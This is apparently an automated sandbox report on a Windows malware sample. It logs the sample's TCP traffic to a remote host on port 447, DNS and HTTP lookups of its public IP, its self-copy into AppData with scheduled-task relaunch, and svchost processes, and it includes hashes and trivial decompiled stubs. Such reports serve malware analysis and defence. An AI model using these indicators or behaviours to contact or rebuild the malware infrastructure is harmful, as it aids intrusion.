Jun 5, 2018 11:07:14.126701117 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126733065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126746893 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126790047 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126818895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126838923 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.126868010 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126939058 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126970053 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127795935 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127841949 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127870083 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127989054 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.128046989 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128076077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128097057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128113985 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128127098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128144979 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128410101 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128448009 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128463984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128480911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128612995 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.128663063 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128683090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.131134987 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.131172895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138351917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138389111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138402939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138432026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138556957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138556004 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.138572931 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138592005 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138597965 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.139341116 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.139369965 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.139496088 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.214442968 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.214494944 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214521885 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214538097 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214555025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214580059 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214603901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214620113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214638948 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214653969 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214677095 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214874983 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.214910984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214939117 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214951992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214975119 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215028048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215048075 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215066910 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215075970 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215084076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215095997 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218028069 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.218077898 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218096018 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218105078 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218111992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218118906 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218127966 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218139887 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218147993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218154907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218163013 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218581915 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.218610048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218625069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218636036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218645096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218655109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218669891 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218678951 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218688965 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218697071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218704939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219084024 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.219108105 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219121933 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219130993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219139099 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219146967 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219489098 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.423033953 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.423181057 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.695260048 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.695302963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.695322037 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.695452929 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.898997068 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999598980 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.999641895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999682903 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999691010 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999706984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999718904 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999733925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999741077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999748945 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999758959 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999767065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999898911 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.999916077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999926090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999933958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999941111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999948025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999954939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999962091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999974966 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999983072 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999994993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001216888 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.001255989 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001271963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001280069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001287937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001296043 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001306057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001313925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001322031 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001331091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001338005 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001898050 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.001924038 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001935959 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001944065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001951933 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001959085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001966000 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001972914 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001980066 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001987934 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001995087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.002362013 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.002383947 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.002393961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.002727032 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.211018085 MESZ4474919294.250.254.22192.168.1.16

UDP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jun 5, 2018 11:06:25.378803968 MESZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8 |
| Jun 5, 2018 11:06:25.543195009 MESZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16 |
| Jun 5, 2018 11:06:25.561767101 MESZ | 51208 | 53 | 192.168.1.16 | 8.8.8.8 |
| Jun 5, 2018 11:06:25.798557043 MESZ | 53 | 51208 | 8.8.8.8 | 192.168.1.16 |
| Jun 5, 2018 11:06:29.601973057 MESZ | 62228 | 53 | 192.168.1.16 | 8.8.8.8 |
| Jun 5, 2018 11:06:30.218615055 MESZ | 53 | 62228 | 8.8.8.8 | 192.168.1.16 |
| Jun 5, 2018 11:06:30.227106094 MESZ | 58659 | 53 | 192.168.1.16 | 8.8.8.8 |
| Jun 5, 2018 11:06:30.462589979 MESZ | 53 | 58659 | 8.8.8.8 | 192.168.1.16 |
| Jun 5, 2018 11:08:01.150739908 MESZ | 56917 | 53 | 192.168.1.16 | 8.8.8.8 |
| Jun 5, 2018 11:08:01.361598015 MESZ | 53 | 56917 | 8.8.8.8 | 192.168.1.16 |
| Jun 5, 2018 11:08:01.376378059 MESZ | 64970 | 53 | 192.168.1.16 | 8.8.8.8 |
| Jun 5, 2018 11:08:01.553617001 MESZ | 53 | 64970 | 8.8.8.8 | 192.168.1.16 |

DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jun 5, 2018 11:06:25.378803968 MESZ | 192.168.1.16 | 8.8.8.8 | 0x47bd | Standard query (0) | checkip.amazonaws.com | A (IP address) | IN (0x0001) |
| Jun 5, 2018 11:06:25.561767101 MESZ | 192.168.1.16 | 8.8.8.8 | 0x787e | Standard query (0) | checkip.amazonaws.com | A (IP address) | IN (0x0001) |

DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Replay Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jun 5, 2018 11:06:25.543195009 MESZ | 8.8.8.8 | 192.168.1.16 | 0x47bd | No error (0) | checkip.amazonaws.com | | 54.84.34.26 | A (IP address) | IN (0x0001) |
| Jun 5, 2018 11:06:25.798557043 MESZ | 8.8.8.8 | 192.168.1.16 | 0x787e | No error (0) | checkip.amazonaws.com | | 54.84.34.26 | A (IP address) | IN (0x0001) |

HTTP Request Dependency Graph

  • checkip.amazonaws.com

HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.1.16 | 49189 | 54.84.34.26 | 80 | C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe |

Timestamp: Jun 5, 2018 11:06:25.802413940 MESZ
kBytes transferred: 0
Direction: OUT
Data:
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Host: checkip.amazonaws.com

Timestamp: Jun 5, 2018 11:06:26.081968069 MESZ
kBytes transferred: 1
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 05 Jun 2018 09:06:25 GMT
Content-Length: 16
Connection: keep-alive
Server: lighttpd/1.4.29
Data Raw: 31 39 37 2e 32 33 31 2e 32 32 31 2e 32 31 31 0a
Data Ascii: 197.231.221.211


Code Manipulations

System Behavior

General

Start time: 11:05:26
Start date: 05/06/2018
Path: C:\Users\user\Desktop\ucD6u0vstJ.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\ucD6u0vstJ.exe'
Imagebase: 0x400000
File size: 233984 bytes
MD5 hash: DE1CE3514F777178D672EE79AC398A74
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:05:27
Start date: 05/06/2018
Path: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Imagebase: 0x400000
File size: 233984 bytes
MD5 hash: DE1CE3514F777178D672EE79AC398A74
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:06:03
Start date: 05/06/2018
Path: C:\Windows\System32\taskeng.exe
Wow64 process (32bit): false
Commandline: taskeng.exe {2B3EACB2-7281-44E8-9006-229A29FB4963} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase: 0x4c0000
File size: 192000 bytes
MD5 hash: 4F2659160AFCCA990305816946F69407
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:06:03
Start date: 05/06/2018
Path: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Imagebase: 0x400000
File size: 233984 bytes
MD5 hash: DE1CE3514F777178D672EE79AC398A74
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:06:30
Start date: 05/06/2018
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: svchost.exe
Imagebase: 0xee0000
File size: 20992 bytes
MD5 hash: 54A47F6B5E09A77E61649109C6A08866
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:07:14
Start date: 05/06/2018
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: svchost.exe
Imagebase: 0xee0000
File size: 20992 bytes
MD5 hash: 54A47F6B5E09A77E61649109C6A08866
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis


    Execution Graph

    Execution Coverage: 7.8%
    Dynamic/Decrypted Code Coverage: 0%
    Signature Coverage: 8%
    Total number of Nodes: 75
    Total number of Limit Nodes: 2



    Executed Functions

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 69 435977-435a3f Sleep ExitProcess
    C-Code - Quality: 100%
    			E00435977() {
    
    				Sleep(0x1f4); // executed
    				ExitProcess(0);
    			}



    0x00435a37
    0x00435a3f

    APIs
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 73 435a1b-435a3f Sleep ExitProcess
    C-Code - Quality: 100%
    			E00435A1B() {
    
    				Sleep(0x1f4); // executed
    				ExitProcess(0);
    			}



    0x00435a37
    0x00435a3f

    APIs
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 71 435996-435a3f Sleep ExitProcess
    C-Code - Quality: 100%
    			E00435996() {
    
    				Sleep(0x1f4); // executed
    				ExitProcess(0);
    			}



    0x00435a37
    0x00435a3f

    APIs
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd

    Control-flow Graph

    APIs
    • GetStartupInfoW.KERNEL32(004399C0,00000022,00439A05,00439B87), ref: 0043594A
    • Sleep.KERNEL32(00001388,0000002F,0000002E), ref: 0043596C
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd

    Control-flow Graph

    APIs
    • GetStartupInfoW.KERNEL32(004399C0,00000022,00439A05,00439B87), ref: 0043594A
    • Sleep.KERNEL32(00001388,0000002F,0000002E), ref: 0043596C
    • Sleep.KERNELBASE(000001F4,00000000,00000003,0000002F,0000002E), ref: 00435A37
    • ExitProcess.KERNEL32 ref: 00435A3F
    Memory Dump Source
    • Source File: 00000001.00000002.12902386282.00435000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.12902325048.00400000.00000002.sdmp
    • Associated: 00000001.00000002.12902332354.00401000.00000040.sdmp
    • Associated: 00000001.00000002.12902340961.00402000.00000080.sdmp
    • Associated: 00000001.00000002.12902363073.0041D000.00000040.sdmp
    • Associated: 00000001.00000002.12902369287.0041E000.00000080.sdmp
    • Associated: 00000001.00000002.12902392207.00436000.00000080.sdmp
    • Associated: 00000001.00000002.12902398552.00437000.00000040.sdmp
    • Associated: 00000001.00000002.12902405220.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_ucD6u0vstJ.jbxd

    Non-executed Functions

    Execution Graph

    Execution Coverage: 5%
    Dynamic/Decrypted Code Coverage: 100%
    Signature Coverage: 18.8%
    Total number of Nodes: 714
    Total number of Limit Nodes: 11

11 API calls 14452->14453 14454 3c218c 14453->14454 14455 3c21e1 14454->14455 14457 3c9090 2 API calls 14454->14457 14456 3c21fd 14455->14456 14458 3c220f 14455->14458 14566 3c7530 SysAllocString 14455->14566 14456->14458 14462 3cbb40 HeapFree 14456->14462 14459 3c21a1 14457->14459 14458->14403 14458->14404 14460 3c3c70 11 API calls 14459->14460 14463 3c21b5 14460->14463 14462->14458 14463->14455 14464 3c9090 2 API calls 14463->14464 14465 3c21cd 14464->14465 14466 3c3c70 11 API calls 14465->14466 14466->14455 14474 3c1050 14467->14474 14471 3cbe23 14471->14377 14472 3cbe14 14472->14471 14473 3cbb40 HeapFree 14472->14473 14473->14471 14477 3c1085 14474->14477 14475 3c10fc 14476 3c1124 14475->14476 14478 3cbb40 HeapFree 14475->14478 14476->14472 14482 3cd750 14476->14482 14477->14475 14479 3d1d90 10 API calls 14477->14479 14478->14476 14480 3c10bd 14479->14480 14480->14475 14492 3c68a0 14480->14492 14483 3cd7d1 14482->14483 14484 3cd767 14482->14484 14483->14472 14558 3c1170 14484->14558 14486 3cd77d 14487 3cd7c3 14486->14487 14488 3cd784 SysAllocString 14486->14488 14487->14483 14489 3cbb40 HeapFree 14487->14489 14488->14487 14491 3cd795 SysFreeString 14488->14491 14489->14483 14491->14487 14493 3c68cd 14492->14493 14494 3c69df 14492->14494 14515 3c6040 14493->14515 14494->14475 14496 3c68df 14497 3c6962 14496->14497 14498 3c6040 11 API calls 14496->14498 14499 3c69bf 14497->14499 14501 3cbb40 HeapFree 14497->14501 14500 3c68f8 14498->14500 14502 3c69cf 14499->14502 14504 3cbb40 HeapFree 14499->14504 14500->14497 14526 3c76e0 14500->14526 14501->14499 14502->14494 14506 3cbb40 HeapFree 14502->14506 14504->14502 14506->14494 14508 3c693f 14508->14497 14509 3c694a 14508->14509 14510 3c6977 14508->14510 14547 3c5900 14509->14547 14512 3d1d90 10 API calls 14510->14512 14513 3c6981 14512->14513 14513->14497 14514 3c698d memcpy 14513->14514 14514->14497 14516 3c605b 14515->14516 14517 3c6065 14515->14517 14516->14496 14518 3d1d90 10 API calls 14517->14518 14521 3c6070 
14518->14521 14520 3c60d2 14522 3c60ef 14520->14522 14524 3cbb40 HeapFree 14520->14524 14521->14520 14525 3c60fb 14521->14525 14552 3cf720 14521->14552 14523 3cbb40 HeapFree 14522->14523 14523->14525 14524->14522 14525->14496 14528 3c7710 14526->14528 14527 3c691f 14527->14497 14534 3cdaf0 14527->14534 14528->14527 14529 3d1d90 10 API calls 14528->14529 14530 3c77aa 14529->14530 14530->14527 14531 3c77b3 memcpy 14530->14531 14532 3c77e0 14531->14532 14532->14527 14533 3cbb40 HeapFree 14532->14533 14533->14527 14536 3cdb1e 14534->14536 14535 3cdb22 14535->14508 14536->14535 14537 3cf720 11 API calls 14536->14537 14538 3cdb66 14537->14538 14539 3c9090 2 API calls 14538->14539 14542 3cdbee 14538->14542 14540 3cdb82 14539->14540 14540->14542 14544 3c9090 2 API calls 14540->14544 14541 3cdc68 14541->14508 14542->14541 14543 3cbb40 HeapFree 14542->14543 14543->14541 14545 3cdbb1 14544->14545 14545->14542 14546 3c9090 2 API calls 14545->14546 14546->14542 14548 3d1d90 10 API calls 14547->14548 14549 3c5919 14548->14549 14550 3c5941 14549->14550 14551 3cbb40 HeapFree 14549->14551 14550->14497 14551->14550 14554 3cf756 14552->14554 14553 3cf7f8 14553->14521 14554->14553 14555 3d1d90 10 API calls 14554->14555 14556 3cf7d2 14555->14556 14556->14553 14557 3cbb40 HeapFree 14556->14557 14557->14553 14559 3c1195 14558->14559 14560 3c11f5 14559->14560 14561 3d1d90 10 API calls 14559->14561 14560->14486 14562 3c11a6 14561->14562 14563 3c11e5 14562->14563 14564 3cbb40 HeapFree 14562->14564 14563->14486 14565 3c11d5 14564->14565 14565->14486 14567 3c7547 14566->14567 14569 3c7555 14566->14569 14568 3c754e SysFreeString 14567->14568 14567->14569 14568->14569 14569->14456 14570 3cfd15 14588 3ce7d0 14570->14588 14572 3cfd25 14573 3cfd2d ??2@YAPAXI 14572->14573 14574 3cfd40 14573->14574 14591 3ce850 14574->14591 14576 3cfd47 14595 3c3d50 14576->14595 14578 3c9480 FreeLibrary 14579 3d04f0 14578->14579 14582 3d04f5 ExitProcess 14579->14582 14580 3cfd54 14581 3c8030 10 API calls 
14580->14581 14587 3d04e6 14580->14587 14583 3d042e 14581->14583 14584 3d1d90 10 API calls 14583->14584 14585 3d0439 14584->14585 14586 3cbb40 HeapFree 14585->14586 14586->14587 14587->14578 14638 3e0790 memset 14588->14638 14592 3ce868 14591->14592 14593 3ce88c CoCreateInstance 14592->14593 14594 3ce86c 14592->14594 14593->14576 14594->14576 14596 3c3d56 14595->14596 14598 3c62c2 14596->14598 14599 3c8030 10 API calls 14596->14599 14597 3c65d9 14597->14580 14598->14597 14600 3cbb40 HeapFree 14598->14600 14601 3c629e 14599->14601 14600->14597 14709 3c32c0 14601->14709 14604 3c62c7 14720 3c5bd0 14604->14720 14605 3c62b7 14780 3e0580 14605->14780 14608 3c62d2 14608->14598 14609 3c9090 2 API calls 14608->14609 14610 3c62eb 14609->14610 14611 3c9090 2 API calls 14610->14611 14612 3c62f9 VariantInit VariantInit 14611->14612 14763 3e0290 SysAllocString 14612->14763 14614 3c634a 14765 3c13c0 ??2@YAPAXI 14614->14765 14616 3c636d 14617 3c13c0 2 API calls 14616->14617 14618 3c6390 14617->14618 14768 3c7cf0 14618->14768 14621 3c7cf0 4 API calls 14622 3c641f VariantClear VariantClear VariantClear 14621->14622 14623 3c65a2 14622->14623 14624 3c6442 14622->14624 14776 3c6d30 14623->14776 14624->14598 14626 3c5bd0 17 API calls 14624->14626 14627 3c6459 